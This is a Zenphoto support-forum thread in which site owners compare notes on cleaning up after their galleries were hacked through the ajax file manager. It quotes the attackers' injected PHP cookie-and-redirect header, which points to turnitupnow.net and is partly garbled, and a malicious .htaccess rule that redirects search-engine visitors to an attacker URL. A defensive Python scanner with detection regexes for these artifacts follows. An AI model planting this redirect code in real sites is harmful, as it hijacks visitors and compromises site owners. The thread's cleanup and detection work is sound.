Is there any difference to the manual changes I made yesterday for 1.4.1.5? (I use SVN to manage my install and I'm loath to download and change if I already took care of it by manually removing it).
No, the 1.4.1.6 release (as noted on the post) just incorporates the changes mentioned in the 2nd security post. Otherwise it is just 1.4.1.5. Btw, that is mentioned in the release post's first sentence... ;-)
Again, note that the svn trunk is NOT 1.4.1.6 but already 1.4.2 beta (the dev svn stream as well) as the 1.4.1.x line was actually considered complete. This has been announced a week or so ago.
A slightly different question: I have downloaded and installed the 1.4.3 DEV (8385) version and done the corrections you suggested in the "Security alert - Part 2 update 2". Am I OK?
P.S. One site was hacked, the other was not, but I cleaned and updated both anyways.
Yes, as far as we know. But I recommend to use the TRUNK svn as that will become the next version 1.4.2. That is beta and will not get new features until the scheduled release (see roadmap on the bugtracker). Using this will help us find bugs we missed.
The DEV svn is for 1.4.3 somewhere in the future. Currently both are still the same but soon this one might get experimental. So we can't recommend to use this on a live site currently.
After being affected by this loophole and clearing out the old install, when I come to upload (cPanel) the install package my host's system is rejecting the 1.4.1.6.zip, saying it contains a virus (scanner is probably ClamAV).
I cannot get any details as to which file it objects to.
Maybe we are missing something here. Without the "ajax file manager" we cannot use the "Files" tab under "Upload".
Which seems to mean the only way to add photos is via the web page upload.
Is there some other way to get Zenphoto to process files we already have copied to the server? That has always been our preferred method to load pictures.
The "Files" tab never provided a way to add photos to your gallery. It is just a way to upload files to your "uploaded" folder which you can then place as you wish on your pages through HTML.
It is the "Images" tab that provided the means for uploading photos. It is still present and operational.
Besides, there is always FTP to upload to your site. Zenphoto always processes images it finds in your albums folders.
SBillard, thanks for clearing that up for us. We are moving from another photo gallery to Zenphoto and just getting used to the file structure of Zenphoto.
Thanks so much for your quick response. It is really appreciated.
Hi all, my site was hacked and I lost a lot of information. But I was able to find some information in the Apache logs. The hacker succeeded in downloading the [link removed by moderator] file and executing it. Its purpose was mostly to remove all files owned by apache. I hope this will help someone!
Hi, I'm OK with this. So the zip contains no virus but PHP, Perl and SQL files. The PHP file is similar to ajaxterm. I think that my issue could help someone. If you want, I can post the PHP file screenshot: http://tinypic.com/r/301ev89/5
My site (fotofill.net) was hacked too. We rescanned the site, had the host do the same. I traced the IP and blocked any IP from Russia-Ukraine. It appears the hacker used tiny_mce to get access. I am pretty new to all this. Here is the message from my host:
After further investigation, it appears that a hacker was able to inject malicious code into most (if not all) your php files by using the tiny_mce editor function from your Zenphoto installation.
They suggested this: 1). Update all scripts and plugins to remove vulnerabilities inherent in older versions.
We did that. We asked Google to scan the site also. Still waiting... My problem now is that my logins and passwords were wiped out at ZP and I cannot get in.
Anything with fotofill.net in it is being blocked by browsers. Can someone help me get to my zp-core? Thanks
If the whole fotofill.net is blocked it is probably by your hosting company. That is a pretty standard response to this kind of attack. For instance my hoster did this. I had to use FTP to cleanse the site and then contact the hoster to have it unblocked.
There is another thread with details on how to cleanse your site, but basically it involves removing all the site files and reloading from backup. Always, of course, do not restore the zenphoto files but obtain the fixed version and install that.
The blocking of the site is not by the hosting company. It is blocked in the browser by using a warning database Google & Co provide that most browser vendors use.
Sorry, you will have to wait until your site is rescanned and removed from that. On Google that might take a few days. You can of course ignore that warning and proceed. How to reset Zenphoto passwords is explained on our troubleshooting.
Hello! I have 2 zenphoto galleries on my site and both of them got hit by the ajax bug so now I am trying to fix it (really annoying because I am in the middle of two large class projects). Based on what I have read on this post and the other couple related posts, this is what I have gathered the solution to fix it is:
1. Delete ajax upload manager folder inside of zenphoto
2. Install latest zenphoto release
3. Go through all php and .htaccess files on the website to ensure they are clean
Does that sound right? I am still new to zenphoto/website management in general and I want to be sure I don't do something stupid while trying to clean it up and lose the 7000+ images between my two galleries, lol.
I am enjoying Zenphoto thus far and thank you for your hard work on this. I am now following the RSS feed so I can get updates/security fixes faster (had I done that before I probably wouldn't be in this boat :P).
I appear to also have been affected by this vulnerability. They had my Zenphoto domain redirecting to http://(hacker's URL).in/jaki/index.php as you can see below and also altered the .htaccess and php files for the other domains in my shared hosting account. The latter changes seem to have had no noticeable effect (the rest of the sites run on Drupal 6 or 7).
Can anyone else who was hacked let me know if the hackers altered anything else on their systems that I should fix? I purged everything but the albums folder from my Zenphoto install and removed the added code from the *.php and .htaccess files on my other domains. Is there anything else I should do to set things right?
Also several of my websites that use ZP were hacked. I have recovered one website, but I'm having trouble with another one: I have deleted all web files and when I visit the URL I keep being redirected, although the site is completely empty; also all htaccess files were deleted. So my question is, what part keeps redirecting?
puregraphx : I just finished recovery from one of my zengallery installs. If you're still experiencing a redirection, chances are there is a shell access only directory above your FTP (this is the case for godaddy and all of their resellers). If you are a godaddy user, you'll need to enable SSH and use port 22 to find the master htaccess file for your shared hosting account (which isn't visible if you're just using FTP on port 21, only SFTP on port 22). I hope this helps.
Can anyone answer if the cache files need to be cleared before or after the upgrade to prevent the same security hole from allowing unauthorized users in? - I've noticed a lot of very long rss cache files (example: rss_ampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampamplang.xml)
I would recommend clearing all caches. It does not hurt as they are recreated on request anyway. It is unlikely that images contain hacked code but the cached html or rss files might (not php but hacked links or js code).
No, such rss files are not normal, unless you have an album with that long name. Album rss feed files look like this: `rss_Screenshots_screenshots_en_US.xml` This is a cached feed of the screenshots subalbum of the Screenshots album (example from our own site). Language version is English which is the default and only one used on our site anyway.
Comments
It's very good thing...
My site was also hacked. I think it is clear now, but I didn't delete the jpg files with the photos. How can I check that they are not infected?
Has this been an issue for anyone else?
Any help is appreciated.
They suggested this:
1). Update all scripts and plugins to remove vulnerabilities inherent in older versions.
2). Scan the local system used to access this account for malware using the following software: MalwareBytes ( http://www.malwarebytes.org/ ) and ComboFix ( http://www.bleepingcomputer.com/combofix/how-to-use-combofix ). Many instances of compromised login details are due to local malware intercepting login details.
For reference, the hackers added this to the top of all PHP files:
```php
global $sessdt_o;
if(!$sessdt_o) {
    $sessdt_o = 1;
    $sessdt_k = "lb11";                       // cookie name used to mark visitors
    if(!@$_COOKIE[$sessdt_k]) {
        // first visit: set the marker cookie, by header or by inline JS if headers were already sent
        $sessdt_f = "102";
        if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); }
        else { echo "document.cookie='".$sessdt_k."=".$sessdt_f."';"; }
    } else {
        if($_COOKIE[$sessdt_k]=="102") {
            // second visit: replace the marker with a random value and build a URL pointing at turnitupnow.net
            $sessdt_f = (rand(1000,9000)+1);
            if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); }
            else { echo "document.cookie='".$sessdt_k."=".$sessdt_f."';"; }
            $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"];
            $sessdt_v = urlencode(strrev($sessdt_j));
            $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200);
            echo "";
            echo "
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr)\.(.*)
RewriteRule ^(.*)$ http://(hacker's URL).in/jaki/index.php [R=301,L]
```
Thanks!
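A triage scan written for this thread as an added example (not Zenphoto code and not from any poster): it walks a web root looking for the four artifacts described above, the `$sessdt_*` header injected into PHP files, the referrer-conditional RewriteRule in .htaccess, a PHP tag hidden inside an image file (the jpg question), and the runaway `rss_ampamp...` cache names. The regexes, the sample tree and the hacker-url.example host are all constructed assumptions.

```python
import pathlib
import re
import tempfile

# Indicators drawn from this thread (constructed regexes, not a vendor signature set): the
# injected $sessdt_* header, a referrer-conditional RewriteRule to an external URL, a PHP
# tag inside an image, and the runaway "ampamp..." cache filename.
PHP_MARKER = re.compile(r"\$sessdt_[a-z]\b")
HTACCESS_REDIRECT = re.compile(
    r"RewriteCond\s+%\{HTTP_REFERER\}.*?RewriteRule\s+\S+\s+https?://", re.I | re.S)
AMP_RUN = re.compile(r"(?:amp){3,}")
PHP_TAG = re.compile(rb"<\?php|<\?=", re.I)


def scan_webroot(root):
    """Walk a web root and return sorted (relative_path, reason) findings."""
    root = pathlib.Path(root)
    findings = []
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        data = path.read_bytes()
        text = data.decode("latin-1")  # never raises; bytes map 1:1 to chars
        if AMP_RUN.search(path.name):
            findings.append((rel, "suspicious cache filename"))
        elif path.suffix.lower() == ".php" and PHP_MARKER.search(text):
            findings.append((rel, "injected sessdt redirect header"))
        elif path.name == ".htaccess" and HTACCESS_REDIRECT.search(text):
            findings.append((rel, "referrer-conditional external redirect"))
        elif path.suffix.lower() in (".jpg", ".jpeg", ".png", ".gif") and PHP_TAG.search(data):
            findings.append((rel, "PHP tag inside image file"))
    return sorted(findings)


def build_sample_site():
    """Constructed sample tree, not a real install; hacker-url.example is a placeholder."""
    root = pathlib.Path(tempfile.mkdtemp(prefix="zp-scan-"))
    samples = {
        "index.php": b"<?php global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; }\n",
        "zp-core/admin.php": b"<?php\n// untouched file\n",
        ".htaccess": b"RewriteEngine On\nRewriteCond %{HTTP_REFERER} ^.*(google|bing)\\.(.*)\n"
                     b"RewriteRule ^(.*)$ http://hacker-url.example/jaki/index.php [R=301,L]\n",
        "albums/clean.jpg": b"\xff\xd8\xff\xe0JFIF\x00",
        "albums/tainted.jpg": b"\xff\xd8\xff\xe0JFIF<?php echo 'x'; ?>",
        "cache/rss_Screenshots_screenshots_en_US.xml": b"<rss/>",
        "cache/rss_" + "amp" * 20 + "lang.xml": b"<rss/>",
    }
    for rel, data in samples.items():
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_bytes(data)
    return str(root)
```

Run it against a copy of the web root (and, as the godaddy post notes, the shell-only directory above it if your host has one) and treat every hit as a file to restore from a known-clean source rather than to edit in place.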
http://www.zenphoto.org/support/topic.php?id=9951#post-58366
different referring domain
all my wordpress files, piwik, sigh
Is this normal activity for zengallery?
Look for an .htaccess file. In my case, that's where all of the redirection code was injected.
hth,
moo